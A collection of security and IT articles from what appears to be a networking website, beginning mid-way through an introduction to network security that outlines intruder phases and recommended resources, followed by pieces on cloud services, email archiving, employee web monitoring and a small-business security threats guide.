Now the attacker will attempt to increase his security clearance on the network. He/She will usually target the administrator accounts or perhaps a CEO's account. If they are focused on a specific target (say your database server) they will look for the credentials of anyone with access to that resource. They will most likely set up a network sniffer to capture all the packets as they go through the network.

They will also start manually hunting around for documents that will give them some interesting information or leverage. Thus any sensitive documents should be encrypted or stored on systems with no connection to the network. This will be the time they use to explore your internal network.

They will look for windows machines with file sharing enabled and see what they can get out of these. Chances are if they didn't come in with a particular objective in mind (for example stealing a database), they will take whatever information they deem to be useful in some way.

Clean Up Phase

Now the attacker has either found what they were looking for, or are satisfied with the level of access they have. They have made sure that they have multiple paths into the network in case you close the first hole. They will now try to cover up any trace of an intrusion. They will manually edit log files to remove entries about them and will make sure they hide any programs they have installed in hard to find places.

Remember, we are dealing with an intruder who is moderately skilled and is not just interested in defacing your website. They know that the only way to keep access will be if you never know something is amiss. In the event that there is a log they are unable to clean up, they may either take a risk leaving it there, or flood the log with bogus attacks, making it difficult for you to single out the real attack.


Where Can I Find More Information?

Without obviously plugging our site too much, the best place for answers to questions relating to this article is in our forums. The Security/Firewalls Forum is the best place to do this -- so you can ask anything from the most basic to the most advanced questions concerning network security there. A lot of common questions have already been answered in the forums, so you will quite likely find answers to questions like 'Which firewall should I use ?'.

As far as off-site resources are concerned, network security is a very vast field and there is seemingly limitless information on the subject. You will never find information at so-called hacker sites full of programs. The best way to learn about network security is to deal with the first word first -- you should be able to talk networking in and out, from packet header to checksum, layer 1 to layer 7.

Once you've got that down, you should start on the security aspect. Start by reading a lot of the papers on the net. Take in the basics first, and make sure you keep reading. Wherever possible, try to experiment with what you have read. If you don't have a home lab, you can build one 'virtually'. See the posts in the Cool Software forum about VMware.


Also, start reading the security mailing lists such as bugtraq and security-basics. Initially you may find yourself unable to understand a lot of what happens there, but the newest vulnerabilities are always announced on these lists. If you follow a vulnerability from the time its discovered to when someone posts an exploit for it, you'll get a very good idea of how the security community works.. and you'll also learn a hell of a lot in the process.

If you're serious about security, it is imperative that you learn a programming language, or at least are able to understand code if not write your own. The best choices are C and assembly language. However knowing PERL and Python are also valuable skills as you can write programs in these languages very quickly.

For now, here are a few links that you can follow for more information:

www.securityfocus.com - A very good site with all the latest news, a very good library and tools collection as well as sections dedicated to basics, intrusion detection, penetration testing etc. Also home of the Bugtraq mailing list.

www.sans.org - A site with excellent resources in its reading room, people who submit papers there are trying for a certification and as a result its mostly original material and of a very high calibre.

www.security-portal.com - A good general security site.

www.cert.org - The CERT coordination center provides updates on the latest threats and how to deal with them. Also has very good best practice tips for admins.

www.securityfocus.com/archive/1 - This is the link to Bugtraq, the best full disclosure security mailing list on the net. Here all the latest vulnerabilities get discussed way before you see them being exploited or in the press.

www.insecure.org - The mailing lists section has copies of bugtraq, full disclosure, security-basics, security-news etc etc. Also the home of nMap, the wonderful port scanner.

seclists.org - This is a direct link to the security lists section of insecure.org.

www.grc.com - For windows home users and newbies just interested in a non technical site. The site is home to Shields Up, which can test your home connection for file sharing vulnerabilities, do a port scan etc, all online. It can be a slightly melodramatic site at times though.

www.eeye.com - Home of the Retina Security Scanner. Considered the industry leader. The E-Eye team also works on a lot of the latest vulnerabilities for the windows platform.

www.nessus.org - Open source vulnerability scanner, and IMNSHO the best one going. If you're a tiger team penetration tester and you don't point nessus at a target, you're either really bad at your job or have a very large ego. If there's a vulnerability in a system, nessus will find it.

www.zonelabs.com - ZoneAlarm personal firewall for windows, considered the best, and also the market leader.

www.sygate.com - Sygate Personal Firewall, provides more configuration options than ZoneAlarm, but is consequently harder to use.

www.secinf.net - Huge selection of articles that are basically windows security related.

www.searchsecurity.com - A techtarget site which you should sign up for, very good info. Chris writes for searchnetworking.com its sister site.. I don't think the references could be much better.

www.antioffline.com - A very good library section on buffer overflows etc.

www.packetstormsecurity.nl - The largest selection of tools and exploits possible.


Conclusion

This 5-page article should serve as a simple introduction to network security. The field itself is too massive to cover in any sort of article, and the amount of cutting edge research that goes on really defies comprehension.

Some of the most intelligent minds work in the security field because it can be a very challenging and stimulating environment. If you like to think out-of-the-box and are the sort of person willing to devote large amounts of your time to reading and questioning why things happen in a particular way, security might be a decent career option for you.

Even if you're not interested in it as a career option, every admin should be aware of the threats and the solutions. Remember, you have to think like them to stop them !

If you're interested in network security, we highly recommend you read through the networking and firewall sections of this website. Going through the whole site will be some of the most enlightening time you'll ever spend online.

If you're looking for a quick fix, here are a few of the more important areas that you might want to cover:

Introduction to Networking

Introduction to Firewalls

Introduction to Network Address Translation (NAT)

Denial Of Service (DoS) Attacks

Locking down Windows networks

Introduction to Network Protocols

Also check out our downloads section where you will find lots of very good security and general networking tools.

We plan on putting up a lot of other security articles in the near future. Some will be basic and introductory like this one, while some may deal with very technical research or techniques.

As always feel free to give us feedback and constructive criticism. All flames however will be directed to /dev/null ;)

  • Hits: 61944

Are Cloud-Based Services Overhyped?

In these hard economic times, cloud computing is becoming a more attractive option for many organizations. Industry analyst firm, The 451 Group predicts that the marketplace for cloud computing will grow from $8.7bn in revenue in 2010 to $16.7bn by 2013. Accompanying this is an increasing amount of hype about cloud computing.

Cloud computing has gone through different stages, yet because the Internet only began to offer significant bandwidth in the 1990s, it became something for the masses over the last decade. Initial applications were known as Hosted Services. Then the term Application Service Provider emerged, with some hosted offerings known as Managed Services. More recently, in addition to these terms, Software as a Service (SaaS) became a catchphrase.  And as momentum for hosted offerings grew, SaaS is now complemented by Infrastructure as a Service, Platform as a Service, and even Hardware as a Service.

Is this a sign of some radical technology shift, or simply a bit more of what we have seen in the past? 

The answer is both. We are witnessing a great increase in global investment towards hosted offerings. These providers are expected to enjoy accelerated growth as Internet bandwidth becomes ubiquitous, faster, and less expensive; as network devices grow smaller; and as critical mass builds. Also, organizations are moving towards cloud services of all kinds through the use of different types of network devices – take, for example, the rise of smart phones, the iPad tablet, and the coming convergence of television and the Internet.

Yet, although cloud solutions may emerge as dominant winners in some emerging economies, on-premise solutions will remain in use. While start-ups and small businesses might find the cloud as the cheaper and safer option for their business – enjoying the latest technology without needing to spend money on an IT infrastructure, staff, and other expenses that come with on premise solutions; larger businesses usually stick to on-premise solutions for both philosophical and practical reasons such as wishing to retain control, and the ability to configure products for their own specific needs.

Gartner's chief security analyst, John Pescatore, for example, believes that cloud security is not enough when it comes to the upper end of the enterprise, financial institutions, and the government. On the other hand, he states that smaller businesses may actually get better security from the cloud. The reason behind this is that while the former has to protect confidential data and cannot pass it on to third parties, the latter is given better security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more).

Although the cloud might appear to be finding its fertile ground only now, especially in these times of belt-tightening, hosted services have been around for a while. For this reason, when choosing a cloud provider, always make sure you choose a company that has proven itself in the marketplace.

 

  • Hits: 12931

What if it Rains in the Cloud?

Cloud computing has become a cost-effective model for small and medium-sized enterprises, SMEs, that wish to use the latest technology on-demand and with no commitments or need to purchase and manage software products. These features have made hosted services an attractive choice, such that industry analyst firm, The 451 Group, has predicted the marketplace for cloud computing will grow from $8.7billion in revenue in 2010 to $16.7billion by 2013.

Yet, many organizations think twice when it comes to entrusting their data to third parties. Let's face it, almost every web user has an account on sites such as Gmail or Facebook – where personal information is saved on a separate mainframe; but when it comes to businesses allowing corporate data to go through third parties, the danger and implications are greater as an error affects a whole system, not just a single individual.

So The Question Arises: What If It Rains In The Cloud?

Some SMEs are apprehensive about using hosted services because their confidential data is being handled by third parties and because they believe the solution provider might fail. Funnily enough, it's usually the other way around. Subject to selecting a reputable provider, smaller businesses can attain better security via cloud computing as the solution provider usually invests more in security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more) than any individual small business could. Also, the second the service provider patches security vulnerability, all customers are instantly protected, as opposed to downloadable patches that the IT team within a company must apply.

And, to prevent data leaks, cloud services providers make it their aim to invest in the best technology infrastructures to protect their clients' information, knowing that even the slightest mistake can ruin their reputation – not to mention potential legal claims – and, with that, their business.

A drawback with some hosted services is that if you decide you want to delete a cloud resource, this might not result in true wiping of the data. In some cases, adequate or timely deletion might be impossible for example, because the disk that needs to be destroyed also stores data from other clients. Also, certain organizations find it difficult to entrust their confidential data to third parties.

Use Your Umbrella

Cloud computing can be the better solution for many SMEs, particularly in the case of start-ups and small businesses which cannot afford to invest in a proper IT infrastructure. The secret is to know what to look for when choosing a provider: Engage the services of a provider that will provide high availability and reliability. It would be wise to avoid cloud service providers that do not have much of a track record, and that perhaps are of limited size and profitability, subject to M&A activity, and changing development priorities.

To enjoy the full potential promised by the technology, it is important to choose a hosted service provider that has proven itself in the marketplace and that has solid ownership and management, applies stringent security measures, uses multiple data centers so as to avoid a single point of failure, provides aggressive solid service level agreement, and is committed to cloud services for the long term.

Following these suggestions, you can have a peace of mind that your data is unlikely to be subjected to ‘bad weather'!

  • Hits: 14910

Three Reasons Why SMEs Should Also Consider Cloud-Based Solutions

Small and medium enterprises (SMEs) are always looking for the optimum way to implement technology within their organizations be it from a technical, financial or personal perspective. Technology solutions can be delivered using one of three common models: as on-premise solutions (i.e. installed on company premises), hosted services (handled by an external third party) or a mix of both. Let's take a look at the cloud-based solutions in this brief post.

The Reasons for Cloud-based Backup Solutions

When talking about a hosted service, we are referring to a delivery model which enables SMEs to make the most out of the latest technology through a third party. Cloud-based solutions or services are gaining in popularity as an alternative strategy for businesses , especially for startups and small businesses, particularly when considering the three reasons below:

•  Financial – Startups and very small SMEs often find it financially difficult to set up the infrastructure and IT system required when they are starting or still building the business. The additional cost to build an IT infrastructure and recruit IT personnel is at times too high and not a priority IT when they just need email and office tools. In such scenario a hosted service makes sense because the company can depend on a third party to provide additional services, such as archiving and email filtering, at a monthly cost. This reduces costs and allows the business to focus on other important areas requiring investment. As the business grows, the IT needs of that company will dictate to what extent a hosted or managed service is necessary and cost-effective.

•  Build your business – The cost saving aspect is particularly important for those businesses that require a basic IT infrastructure but it still want to benefit from security and operational efficiency without spending any money. Hosted / managed services give companies the option to test and try technologies before deciding whether they need to move their IT in-house or leave it in the hands of third parties.

•  Pay-as-you-go or rental basis – Instead of investing heavily in IT hardware, software and personnel, a pay-per-use or subscription system makes more sense. Companies choosing this delivery model would do well, however, to read contractual agreements carefully. Many vendors/providers tie in customers for two or three years, which may be just right for a startup SME, but companies should look closely at any associated costs if they decide to stop the service and at whether migrating their data will prove a very costly affair. The key to choosing a hosted or managed service is to do one's homework and plan well. Not all companies will find a cloud-based service to be suitable even if the cost structure appears to be attractive.

Are There Any Drawbacks To This System?

Despite all the advantages mentioned above, some SMEs are still apprehensive when it comes to cloud-based solutions because they are concerned about their data's security. Although an important consideration, a quality cloud-based provider will have invested heavily in security and, more often than not, in systems that are beyond what a small business can afford to implement. A good provider will have invested in multiple backup locations, 24/7 monitoring, physical security to protect sites, and more.

On the other hand, the fact that the data would be exposed to third parties and not handled internally could be seen as a drawback by some companies, especially those handling sensitive data. As stated earlier, beware of the fine print and medium- to long-term costs before committing.

Another Option

If you're a server-hugger and need to have that all-important server close to your office, businesses can always combine their on-premise solution with a hosted or managed service – benefiting from the advantages and doing away with the inherent disadvantages.

Every company is different and whether you decide to go for a cloud-based solution or not, keep in mind that there is no right or wrong – it's all a matter of what your current business's infrastructure is like and your needs at the time. However, if you are a startup or a small business, cloud-based solutions are an attractive option worth taking into consideration.

 

  • Hits: 15191

61% of SMEs use Email Archiving in-house – What About the Others ?

A recent survey on email archiving, based on 202 US-based SMEs, found that a growing number of organizations are considering or would consider a third-party hosted email archiving service. A total of 18% of those organizations that already use an email archiving solution, have opted for a hosted service, while 38% said are open to using such a service.

At the same time, 51% of those surveyed said they would still only use an on-premise email archiving solution.

The findings paint an interesting picture of email archiving use among SMEs. Apart from the shocking statistic that more than 63% do not archive their email, those that do, or consider doing so, are interested in the various options available.

articles-email-archiving-1

On-premise or Hosted?

An increasing number of IT services are now offered as Software as a Service (SaaS) or hosted by a third party. Many services prove to be very cost effective when implemented at the scale which outsource service providers can manage, but there are still many admins – as the survey shows – who prefer to keep everything in house; security personnel who want to maintain data integrity internally, and business leaders who do not see the value of a cloud solution for their organization because their requirements dictate otherwise.

What is Email Archiving?

At its simplest, email archiving technology helps businesses maintain a copy of all emails sent or received from all users. This indispensible solution can be used for searches and to meet eDiscovery, compliance audits and reviews, to increase the overall long term storage capacity of the email system, and as a disaster recovery repository to ensure data availability.

Because email is so heavily tied to the internet, email archiving can readily be outsourced to service providers and can often be combined with other outsourced services like spam and malware filtering. Hosted email archiving eases the load on your IT staff, allowing them to focus on core activities, and can be a more economical solution than paying for additional servers, storage, and tape backups. It does of course require you to entrust your data to a third party, and often this is where companies may opt for an internal solution.

An internal email archiving solution, on the other hand, requires only minimal care and feeding, and offers the advantage of maintaining all data internally.

Email archiving solutions are essential for all businesses of any size, and organizations should consider the pros and cons of both hosted and on-premises email archiving, and deploy the solution which best suits their company's budget and needs.

  • Hits: 13719

Email Security - Can't Live Without It!

This white paper explains why antivirus software alone is not enough to protect your organization against the current and future onslaught of computer viruses. Examining the different kinds of email threats and email attack methods, this paper describes the need for a solid server-based content-checking gateway to safeguard your business against email viruses and attacks as well as information leaks.

We apologize but this paper is no longer available. Back to the Security Articles section.

  • Hits: 11751

Log-Based Intrusion-Detection and Analysis in Windows Servers

Introduction - How to Perform Network-Wide Security Event Log Management

Microsoft Windows machines have basic audit facilities but they fall short of fulfilling real-life business needs(i.e., monitoring Windows computers in real-time, periodically analyzing security activity, and maintaining along-term audit trail). Therefore, the need exists for a log-based intrusion detection and analysis tool such as EventsManager.

This paper explains how EventsManager’s innovative architecture can fill the gapsin Windows’ security log functionality – without hurting performance and while remaining cost-effective. Itdiscusses the use of EventsManager to implement best practice and fulfill due diligence requirementsimposed by auditors and regulatory agencies; and provides strategies for making maximum use of GFIEventsManager’s capabilities.

This white paper is no longer available by the vendor. To read similar interesting security articles, please visit our Security Articles section.

  • Hits: 13695

Web Monitoring for Employee Productivity Enhancement

All too often when web monitoring and Internet use restrictions are put into place it hurts company morale and does little to

enhance employee productivity. Not wanting to create friction in the workplace many employers shy away from using what could be a significant employee productivity enhancement tool. Wasting time through Internet activities is simple and it’s a huge hidden cost to business. Just answering a few personal e-mails, checking the sports scores, reading the news headlines and checking to see how your bid is holding up can easily waste an hour of time each day. If the company has an 8 person CAD department and each of them spends an hour day on the above activities, that’s a whole employee wasted!

Employees both want and don’t want to have their Internet use restricted. The key to success in gaining productivity and employee acceptance of the problem is the perception of fairness, clear goals and self enforcement.

Why Employees Don’t Want Internet Blocking

  1. They don’t know what is blocked and what is allowed. This uncertainty creates fear that they may do “something” that could hurt their advancement opportunities or worse jeopardize their job.
  2. Someone ruined it for everyone and that person still works here. When everyone is punished, no one is happy. Resentment builds against the employee known to have visited inappropriate websites.
  3. There’s no procedure in place for allowing an employee access to a blocked website. When an employee finds that a website they tried to access is blocked, what do they do? Certainly this indiscretion is going to show up on a report somewhere. What if they really need that site? Is there a procedure in place for allowing this person to access it?

Uncertainty is fodder for loss of morale. In today’s economic climate employees are especially sensitive to any action that can be perceived as clamping down on them. Therefore a web monitoring program must be developed that can be viewed in a positive light by all employees.

Why Employers are Afraid of Internet Blocking

  • The potential of adding to IT costs and human resources headaches takes the away the value from web monitoring. The Internet is a big place and employees are smart. Employers don’t want to get into a situation where they are simply chasing their tail, trading one productivity loss by incurred costs and frustration elsewhere.
  • Employers want to allow employee freedom. There is general recognition by employers that a happy employee is a loyal productive employee. Allowing certain freedoms creates a more satisfying work environment. The impact of taking that away may cause good employees to leave and an increase in turn over can be costly.

The fear of trading one cost for another or trading one headache for another has prevented many employers from implementing internet monitoring and blocking. A mistrust of IT services may also come into play.Technology got us into this situation, where up to 20% of employee time is spent on the Internet, many employers don’t trust that technology can also help them gain that productivity back. A monitoring program needs to be simple to implement and maintain.

Why Employees Want Internet Controls

  • Employees are very aware of what their co-workers are doing or not doing. If an employee in the office spends an hour every day monitoring their auctions on ebay, or reading personal e-mail or chatting onIM every other employee in the office knows it and resents it. If they are working hard, everyone elseshould be too.
  • Unfortunately pornographic and other offensive material finds its way into the office when the Internet is unrestricted. Exposure to this material puts the employee in a difficult situation. Do they tell the boss? Do they try to ignore it? Do they talk to the employee themselves? The employee would rather not be put into this situation.
  • Employees want to work for successful, growing companies. Solid corporate policies that are seen as a necessary means to continue to propel the company forward add to employee satisfaction. Web monitoring can be one of those policies.

How Employers can Gain Employee Support for Web Monitoring

  • Provide a clear, fair policy statement and expose the reasoning and goals. Keep it simple. Employees won’t read a long policy position paper. Stick to the facts and use positive language.
  • Policies that make sense to staff are easy to enforce
  • Policies with goals are easy to measure
  • When the goal has been reached celebrate with your employees in a big way. Everyone likes to feel like part of the team.
  • Empower your employees. White list, don’t black list. Let each employee actively participate in deciding which sites are allowed and which aren’t for them. Let the employee tell you what they need to be most productive and then provide it, no questions asked.
  • Most job positions can be boiled down to between 5 and 20 websites. Employees know what they need. Ask them to provide a list.
  • Show employees the web monitoring reports. Let them see the before and after and let them see the on-going reports. This will encourage self monitoring. This is an enforcement tool in disguise. Employees know that management can view these reports too and will take care that they make them look good.
  • Send employees a weekly report on their Internet usage. They will look at and will act upon to make sure they are portrayed to management in the best light and may even compare themselves against others.

Summary

Web monitoring is good for business. The Internet as a productivity tool has wide acceptance but recent changes have brought new distractions costing business some of those productivity gains. The Internet can be controlled but needs to be done in a way that allows for employee buy-in, self monitoring and self enforcement to be successful.

  • Hits: 13346

Security Threats: A Guide for Small & Medium Businesses

A successful business works on the basis of revenue growth and loss prevention. Small and medium-sized businesses are particularly hit hard when either one or both of these business requirements suffer. Data leakage, down-time and reputation loss can easily turn away new and existing customers if such situations are not handled appropriately and quickly. This may, in turn, impact on the company’s bottom line and ultimately profit margins. A computer virus outbreak or a network breach can cost a business thousands of dollars. In some cases, it may even lead to legal liability and lawsuits.

The truth is that many organizations would like to have a secure IT environment but very often this need comes into conflict with other priorities. Firms often find the task of keeping the business functions aligned with the security process highly challenging. When economic circumstances look dire, it is easy to turn security into a checklist item that keeps being pushed back. However the reality is that, in such situations, security should be a primary issue. The likelihood of threats affecting your business will probably increase and the impact can be more detrimental if it tarnishes your reputation.This paper aims to help small and medium-sized businesses focus on threats that are likely to have an impact on, and affect, the organization.

These threats specifically target small and medium-sized business rather than enterprise companies or home users.

Security Threats That Affect SMBs - Malicious Internet Content

Most modern small or medium-sized businesses need an Internet connection to operate. If you remove thismeans of communication, many areas of the organization will not be able to function properly or else they maybe forced to revert to old, inefficient systems. Just think how important email has become and that for manyorganizations this is the primary means of communication. Even phone communications are changing shapewith Voice over IP becoming a standard in many organizations.At some point, most organizations have been the victim of a computer virus attack.

While many may have antivirusprotection, it is not unusual for an organization of more than 10 employees to use email or the internetwithout any form of protection. Even large organizations are not spared. Recently, three hospitals in Londonhad to shut down their entire network due to an infection of a version of a worm called Mytob. Most of the timewe do not hear of small or medium-sized businesses becoming victims of such infections because it is not intheir interest to publicize these incidents. Many small or medium-sized business networks cannot afford toemploy prevention mechanisms such as network segregation.

These factors simply make it easier for a worm tospread throughout an organization.Malware is a term that includes computer viruses, worms, Trojans and any other kinds of malicious software.Employees and end users within an organization may unknowingly introduce malware on the network whenthey run malicious executable code (EXE files). Sometimes they might receive an email with an attached wormor download spyware when visiting a malicious website. Alternatively, to get work done, employees maydecide to install pirated software for which they do not have a license. This software tends to have more codethan advertised and is a common method used by malware writers to infect the end user’s computers. Anorganization that operates efficiently usually has established ways to share files and content across theorganization. These methods can also be abused by worms to further infect computer systems on the network.Computer malware does not have to be introduced manually or consciously.

Basic software packages installedon desktop computers such as Internet Explorer, Firefox, Adobe Acrobat Reader or Flash have their fair share ofsecurity vulnerabilities. These security weaknesses are actively exploited by malware writers to automaticallyinfect victim’s computers. Such attacks are known as drive-by downloads because the user does not haveknowledge of malicious files being downloaded onto his or her computer. In 2007 Google issued an alert 1describing 450,000 web pages that can install malware without the user’s consent.

Then You Get Social Engineering Attacks

This term refers to a set of techniques whereby attackers make themost of weaknesses in human nature rather than flaws within the technology. A phishing attack is a type ofsocial engineering attack that is normally opportunistic and targets a subset of society. A phishing emailmessage will typically look very familiar to the end users – it will make use of genuine logos and other visuals(from a well-known bank, for example) and will, for all intents and purposes, appear to be the genuine thing.When the end user follows the instructions in the email, he or she is directed to reveal sensitive or privateinformation such as passwords, pin codes and credit card numbers.

Employees and desktop computers are not the only target in an organization. Most small or medium-sizedcompanies need to make use of servers for email, customer relationship management and file sharing. Theseservers tend to hold critical information that can easily become a target of an attack. Additionally, the movetowards web applications has introduced a large number of new security vulnerabilities that are activelyexploited by attackers to gain access to these web applications. If these services are compromised there is ahigh risk that sensitive information can be leaked and used by cyber-criminals to commit fraud.

Attacks on Physical Systems

Internet-borne attacks are not the only security issue that organizations face. Laptops and mobiles areentrusted with the most sensitive of information about the organization. These devices, whether they arecompany property or personally owned, often contain company documents and are used to log on to thecompany network. More often than not, these mobile devices are also used during conferences and travel, thusrunning the risk of physical theft.

The number of laptops and mobile devices stolen per year is ever on theincrease. Attrition.org had over 400 articles in 20082 related to high profile data loss, many of which involvedstolen laptops and missing disks. If it happens to major hospitals and governments that have established ruleson handling such situations, why should it not happen to smaller businesses?

Another Threat Affecting Physical Security is that of Unprotected Endpoints

USB ports and DVD drives can bothbe used to leak data and introduce malware on the network. A USB stick that is mainly used for work and maycontain sensitive documents, becomes a security risk if it is taken home and left lying around and othermembers of the family use it on their home PC. While the employee may understand the sensitive nature of theinformation stored on the USB stick, the rest of the family will probably not.

They may copy files back and forthwithout considering the implications. This is typically a case of negligence but it can also be the work of atargeted attack, where internal employees can take large amounts of information out of the company.Small and medium-sized businesses may overlook the importance of securing the physical network and serverroom to prevent unauthorized persons from gaining access. Open network points and unprotected serverrooms can allow disgruntled employees and visitors to connect to the network and launch attacks such as ARP spoofing to capture network traffic with no encryption and steal passwords and content.

Authentication and Privilege Attacks

Passwords remain the number one vulnerability in many systems. It is not an easy task to have a secure systemwhereby people are required to choose a unique password that others cannot guess but is still easy for them toremember. Nowadays most people have at least five other passwords to remember, and the password used forcompany business should not be the same one used for webmail accounts, site memberships and so on. Highprofile intrusions such as the one on Twitter3 (the password was happiness), clearly show that passwords areoften the most common and universal security weakness and attacks exploiting this weakness do not require alot of technical knowledge.

Password policies can go a long way to mitigate the risk, but if the password policy is too strict people will findways and means to get around it. They will write the password on sticky notes, share them with their colleaguesor simply find a keyboard pattern (1q2w3e4r5t) that is easy to remember but also easy to guess.

Most complex password policies can be easily rendered useless by non-technological means.In small and medium-sized businesses, systems administrators are often found to be doing the work of thenetwork operators and project managers as well as security analysts. Therefore a disgruntled systemsadministrator will be a major security problem due to the amount of responsibility (and access rights) that he orshe holds. With full access privileges, a systems administrator may plan a logic bomb, backdoor accounts or leaksensitive company information that may greatly affect the stability and reputation of the organization.Additionally, in many cases the systems administrator is the person who sets the passwords for importantservices or servers. When he or she leaves the organization, these passwords may not be changed (especially ifnot documented) thus leaving a backdoor for the ex-employee.

A startup company called JournalSpace4 wascaught with no backups when their former system administrator decided to wipe out the main database. Thisproved to be disastrous for the company which ended up asking users to retrieve their content from Google’scache.The company’s management team may also have administrative privileges on their personal computers orlaptops. The reasons vary but they may want to be able to install new software or simply to have more controlof their machines. The problem with this scenario is that one compromised machine is all that an attacker needsto target an organization.

The firm itself does not need to be specifically picked out but may simply become avictim of an attack aimed at a particular vulnerable software package. Even when user accounts on the network are supposed to have reduced privileges, there may be times whereprivilege creep occurs. For example, a manager that hands over an old project to another manager may retainthe old privileges for years even after the handover!

When his or her account is compromised, the intruder alsogains access to the old project.Employees with mobile devices and laptop computers can pose a significant risk when they make use ofunsecured wireless networks whilst attending a conference or during their stay at a hotel. In many cases,inadequate or no encryption is used and anyone ‘in between’ can view and modify the network traffic. This canbe the start of an intrusion leading to compromised company accounts and networks.

Denial Of Service

In an attempt to minimize costs, or simply through negligence, most small and some medium-sized businesseshave various single points of failures. Denial of service is an attack that prevents legitimate users from makinguse of a service and it can be very hard to prevent. The means to carry out a DoS attack and the motives mayvary, but it typically leads to downtime and legitimate customers losing confidence in the organization - and itis not necessarily due to an Internet-borne incident.

In 2008 many organizations in the Mediterranean Sea basin and in the Middle East suffered Internet downtimedue to damages to the underwater Internet cables. Some of these organizations relied on a single Internetconnection, and their business was driven by Internet communications.

Having such a single point of failureproved to be very damaging for these organizations in terms of lost productivity and lost business. Reliability isa major concern for most businesses and their inability to address even one single point of failure can be costly.If an organization is not prepared for a security incident, it will probably not handle the situation appropriately.

One question that needs to be asked is: if a virus outbreak does occur, who should handle the various steps thatneed to be taken to get the systems back in shape? If an organization is simply relying on the systemsadministrator to handle such incidents, then that organization is not acknowledging that such a situation is notsimply technical in nature. It is important to be able to identify the entry point, to approach the personsconcerned and to have policies in place to prevent future occurrences - apart from simply removing the virusfrom the network! If all these tasks are left to a systems administrator, who might have to do everything ad hoc,then that is a formula for lengthy downtime.

Addressing Security Threats - An Anti-virus is not an Option

The volume of malware that can hit organizations today is enormous and the attack vectors are multiple.Viruses may spread through email, websites, USB sticks, and instant messenger programs to name but a few. Ifan organization does not have an anti-virus installed, the safety of the desktop computers will be at the mercyof the end user – and relying on the end user is not advisable or worth the risk.

Protecting desktop workstations is only one recommended practice. Once virus code is present on a desktopcomputer, it becomes a race between the virus and the anti-virus. Most malware has functionality to disableyour anti-virus software, firewalls and so on. Therefore you do not want the virus to get to your desktopcomputer in the first place!The solution is to deploy content filtering at the gateway.

Anti-virus can be part of the content filtering strategywhich can be installed at the email and web gateway. Email accounts are frequently spammed with maliciousemail attachments. These files often appear to come from legitimate contacts thus fooling the end user intorunning the malware code. Leaving the decision to the user whether or not to trust an attachment received byemail is never a good idea.

By blocking malware at the email gateway, you are greatly reducing the risk that endusers may make a mistake and open an infected file. Similarly, scanning all incoming web (HTTP) traffic formalicious code addresses a major infection vector and is a requirement when running a secure networkenvironment.

Security Awareness

A large percentage of successful attacks do not necessarily exploit technical vulnerabilities. Instead they rely onsocial engineering and people’s willingness to trust others. There are two extremes: either employees in anorganization totally mistrust each other to such an extent that the sharing of data or information is nil; or, at theother end of the scale, you have total trust between all employees.

In organizations neither approach isdesirable. There has to be an element of trust throughout an organization but checks and balances are just asimportant. Employees need to be given the opportunity to work and share data but they must also be aware ofthe security issues that arise as a result of their actions. This is why a security awareness program is soimportant.For example, malware often relies on victims to run an executable file to spread and infect a computer ornetwork.

Telling your employees not to open emails from unknown senders is not enough. They need to betold that in so doing they risk losing all their work, their passwords and other confidential details to thirdparties. They need to understand what behavior is acceptable when dealing with email and web content.Anything suspicious should be reported to someone who can handle security incidents. Having opencommunication across different departments makes for better information security, since many socialengineering attacks abuse the communication breakdowns across departments.

Additionally, it is important tokeep in mind that a positive working environment where people are happy in their job is less susceptible toinsider attacks than an oppressive workplace.

Endpoint Security

A lot of information in an organization is not centralized. Even when there is a central system, information isoften shared between different users, different devices and copied numerous times. In contrast with perimetersecurity, endpoint security is the concept that each device in an organization needs to be secured. It isrecommended that sensitive information is encrypted on portable devices such as laptops.

Additionally,removable storage such as DVD drives, floppy drives and USB ports may be blocked if they are considered to bea major threat vector for malware infections or data leakage.Securing endpoints on a network may require extensive planning and auditing. For example, policies can beapplied that state that only certain computers (e.g. laptops) can connect to specific networks. It may also makesense to restrict usage of wireless (WiFi) access points.

Policies

Policies are the basis of every information security program. It is useless taking security precautions or trying tomanage a secure environment if there are no objectives or clearly defined rules. Policies clarify what is or is notallowed in an organization as well as define the procedures that apply in different situations. They should beclear and have the full backing of senior management. Finally they need to be communicated to theorganization’s staff and enforced accordingly.

There are various policies, some of which can be enforced through technology and others which have to beenforced through human resources. For example, password complexity policies can be enforced throughWindows domain policies. On the other hand, a policy which ensures that company USB sticks are not takenhome may need to be enforced through awareness and labeling.

As with most security precautions, it isimportant that policies that affect security are driven by business objectives rather than gut feelings. If securitypolicies are too strict, they will be bypassed, thus creating a false sense of security and possibly create newattack vectors.

Role Separation

Separation of duties, auditing and the principle of least privilege can go a long way in protecting anorganization from having single points of failure and privilege creep. By employing separation of duties, theimpact of a particular employee turning against the organization is greatly reduced. For example, a systemadministrator who is not allowed to make alterations to the database server directly, but has to ask thedatabase administrator and document his actions, is a good use of separation of duties.

A security analyst whoreceives a report when a network operator makes changes to the firewall access control lists is a goodapplication of auditing. If a manager has no business need to install software on a regular basis, then his or heraccount should not be granted such privileges (power user on Windows). These concepts are very importantand it all boils down to who is watching the watchers.

Backup and Redundant Systems

Although less glamorous than other topics in Information Security, backups remain one of the most reliablesolutions. Making use of backups can have a direct business benefit when things go wrong. Disasters do occurand an organization will come across situations when hardware fails or a user (intentionally or otherwise)deletes important data.

A well-managed and tested backup system will get the business back up and runningin very little time compared to other disaster recovery solutions. It is therefore important that backups are notonly automated to avoid human error but also periodically tested. It is useless having a backup system ifrestoration does not function as advertised.Redundant systems allow a business to continue working even if a disaster occurs.

Backup servers andalternative network connections can help to reduce downtime or at least provide a business with limitedresources until all systems and data are restored.

Keeping your Systems Patched

New advisories addressing security vulnerabilities in software are published on a daily basis. It is not an easytask to stay up-to-date with all the vulnerabilities that apply for software installed on the network, thereforemany organizations make use of a patch management system to handle the task. It is important to note thatpatches and security updates are not only issued for Microsoft products but also for third party software. Forexample, although the web browser is running the latest updates, a desktop can still be compromised whenvisiting a website simply because it is running a vulnerable version of Adobe Flash.

Additionally it may beimportant to assess the impact of vulnerability before applying a patch, rather than applying patchesreligiously. It is also important to test security updates before applying them to a live system. The reason is that,from time to time, vendors issue patches that may conflict with other systems or that were not tested for yourparticular configuration.

